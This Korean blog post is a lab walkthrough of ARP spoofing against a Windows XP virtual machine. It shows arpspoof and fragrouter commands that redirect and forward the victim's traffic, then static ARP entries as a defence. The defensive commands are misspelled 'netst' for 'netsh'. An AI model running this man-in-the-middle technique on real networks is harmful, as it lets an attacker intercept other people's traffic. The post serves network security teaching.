본문 바로가기
네트워크

ARP Spoofing

by ^..^v 2019. 6. 7.
728x90
반응형

ARP(Address Resolution Protocol)

 

ARP Spoofing

 

실습환경

Kali#1 : 192.168.111.130 

Kali#2 : 192.168.111.131

WinXP : 192.168.111.140

 

01. WinXP에서 네이버 접속을 확인

 

02. WinXP에서 네트워크 설정 정보와 arp cache table 확인

C:\Documents and Settings\Administrator>arp -a

Interface: 192.168.111.140 --- 0x2
  Internet Address      Physical Address      Type
  192.168.111.2         00-50-56-fd-f9-c0     dynamic

 

03. Kali#2에서 WinXP에게 Gateway가 자신이라고 속임 (ARP Spoofing)

명령어 형식 ⇒ # arpspoof -i eth0 -t VICTIM_IP(WINXP) GATEWAY_IP
# arpspoof -i eth0 -t 192.168.111.140 192.168.111.2

 

04. WinXP에서 arp cache table 확인 ⇒ gateway의 mac 주소가 변경된 것을 확인

C:\Documents and Settings\Administrator>arp -a

Interface: 192.168.111.140 --- 0x2
  Internet Address      Physical Address      Type
  192.168.111.2         00-50-56-34-96-a1     dynamic
  192.168.111.131       00-50-56-34-96-a1     dynamic

C:\Documents and Settings\Administrator>arp -a

Interface: 192.168.111.140 --- 0x2
  Internet Address      Physical Address      Type
  192.168.111.2         00-50-56-34-96-a1     dynamic

 

05. WinXP에서 네이버로 접속이 되지 않는 것을 확인

 

06. Kali#2에서 fragrouter 명령으로 가로챈 네트워크 패킷을 라우팅

root@kali:~# fragrouter -B1

 

07. Kali#1에서 네이버 접속을 확인

 

08. Kali#2에서 Kali#1으로 arp spoofing, Kali#1에서 wireshark를 이용해서 arp 패킷을 확인 ⇒ destination mac이 잘못된 것을 확인

 

ARP Spoofing 방어

ARP cache table에 Gateway 등의 MAC 주소를 정적으로 설정

 

Windows

> arp -s GATEWAY_IP GATEWAY_MAC

 

> netst interface ip delete neighbors "NETWORK_CARD_NAME" "GATEWAY_IP"

> netst interface ip add neighbors "NETWORK_CARD_NAME" "GATEWAY_IP" "GATEWAY_MAC"

 

728x90
반응형

'네트워크' 카테고리의 다른 글

scapy  (0) 2019.06.07
MTM(Man in The Middle) attack  (0) 2019.06.07
Port Scanning  (0) 2019.06.07
TCP/IP  (0) 2019.05.22
통신 프로토콜, OSI 참조 모델, 회선 교환과 패킷 교환  (0) 2019.05.22

댓글